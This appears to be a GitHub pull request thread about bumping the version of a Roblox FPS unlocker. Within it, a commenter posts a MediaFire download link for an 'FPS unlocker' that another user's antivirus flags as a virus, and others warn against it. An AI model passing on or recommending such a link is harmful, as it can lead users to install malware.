### PR TITLE
Update Version

### PR DESCRIPTION
**Pull request by peyton2465**

### CODE REVIEW

**Comment by Naathaann** [comment]
idk lol

**Comment by PhoenixShay** [comment]
Arguably it would be 4.3.2 if we were to do another release. doesn't matter too much

**Comment by robloxia15u** [comment]
I found an FPS unlocker for Roblox and it works
https://www.mediafire.com/file/ei6dnl24qdbtee6/RFU-x86.zip/file

**Comment by RedKinopio** [comment]
my anti virus detects something in it as a virus and just deletes it if I try to run it

**Comment by insyri** [comment]
> I found an FPS unlocker for Roblox and it works
> https://www.mediafire.com/file/ei6dnl24qdbtee6/RFU-x86.zip/file
## **Do not download this unless you know what you are doing.**
image

If anyone is willing to download it and run it into https://www.virustotal.com/gui/home/upload to check it's summary that would be great.

**Comment by thepwrtank18** [comment]
> I found an FPS unlocker for Roblox and it works
> https://www.mediafire.com/file/ei6dnl24qdbtee6/RFU-x86.zip/file

you are on a download for an fps unlocker you noob

**Comment by peyton2465** [comment]
> Arguably it would be 4.3.2 if we were to do another release. doesn't matter too much

Well the current release prompts you to update to the "latest version" every time you open it. This change would make it stop showing the message box when it's first opened.

**Comment by Speedymario** [comment]
So we'll have to wait for tomorrow to get a new release, right?

**Comment by insyri** [comment]
> So we'll have to wait for tomorrow to get a new release, right?

It works already. **ow.**
image

**Comment by froggisfriend** [comment]
sup lewis

> I found an FPS unlocker for Roblox and it works
> https://www.mediafire.com/file/ei6dnl24qdbtee6/RFU-x86.zip/file
whats good lewis!!

**Pull request merged**
